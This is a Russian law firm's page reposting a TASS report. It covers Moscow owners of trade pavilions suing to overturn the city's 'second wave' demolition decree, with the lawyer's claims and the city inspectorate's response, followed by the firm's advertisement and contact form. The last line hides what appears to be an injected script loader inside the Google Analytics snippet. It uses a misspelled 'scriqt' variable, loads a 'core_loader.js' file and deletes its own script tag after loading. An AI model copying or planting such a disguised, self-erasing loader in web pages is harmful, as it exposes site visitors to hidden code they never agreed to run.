Собственники самостроев в Москве начали обжаловать в суде «вторую волну» сноса

Собственники самостроев в Москве начали обжаловать в суде «вторую волну» сноса

Собственники торговых помещений, признанных самостроями и подлежащих сносу, начали обжаловать в суде соответствующее постановление правительства Москвы. Об этом в среду сообщил ТАСС адвокат Артур Айрапетов, представляющий интересы собственников, чьи торговые объекты будут снесены.

Отменить постановление и ввести мораторий

«Вчера, буквально через полчаса после того, как был опубликован список “второй волны” сноса, я обратился в Мосгорсуд с исковым заявлением о признании всего нового московского постановления недействительным, не соответствующим законам, Конституции РФ. Надеюсь, суд рассмотрит это дело объективно и беспристрастно. Сегодня в 9 часов утра было подано второе заявление, это компания “Фортуна-Импульс”. Больше пока никто не обращался, но я уверен, что сейчас пойдет волна исков в Мосгорсуд о признании постановления недействительным — это исключительно вопрос времени», — сказал он.

Айрапетов отметил, что он совместно с Ассоциацией защиты прав собственников Москвы обратился к президенту России Владимиру Путину с просьбой ввести мораторий на снос торговых объектов. «Мы надеемся по большей части на этот мораторий. Дело в том, что Владимир Владимирович буквально в начале июня давал официальное указание премьер-министру разобраться с вопросами сноса и законностью этой процедуры. И в промежутке, пока господин Медведев еще не отреагировал на это поручение, были сделаны подобные спешные действия со стороны правительства Москвы», — отметил собеседник агентства.

Также направлено обращение в Конституционный суд РФ с просьбой оценку действиям правительства Москвы по «первой ночи длинных ковшей». «К сожалению, Москва не дождалась решения Конституционного суда, которое планируется вынести, примерно, в июле месяце, и действует на опережение. Если Конституционный суд примет решение о том, что это было незаконно, бюджет Москвы понесет многомиллиардные убытки», — сказал Айрапетов.

Позиция московских властей

Как пояснили ТАСС в пресс-службе Госинспекции по контролю за использованием объектов недвижимости Москвы, «у владельцев есть право подавать в суд, проводить какие-то судебные разбирательства». «Однако на первом этапе сноса, когда также подавались иски, Мосгорсуд и Высший арбитражный суд Москвы вынесли решения в пользу города. Правовая позиция суда была такова: власти действуют строго в соответствии с федеральным законодательством (ст. № 222 Гражданского кодекса РФ). Постановление (829-ПП от 8 декабря 2015 года) было оставлено в силе, и правомерность действий городских властей разъяснена судом», — сказал собеседник агентства.

Ранее на заседании правительства Москвы мэр столицы Сергей Собянин сообщил о том, что властями города принято решение снести еще 107 объектов самостроя. В частности, 84 из них расположены в зонах метро. Градоначальник поручил оказать содействие арендаторам по поиску новых торговых площадей, обеспечить полную безопасность при сносе этих объектов, разработать проекты благоустройства на их месте и в ближайшее время реализовать. Владельцы объектов, включенных в сносной перечень, будут извещены в течение 7 дней, демонтаж самовольных построек силами города начнется не ранее конца августа — начала сентября.

Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');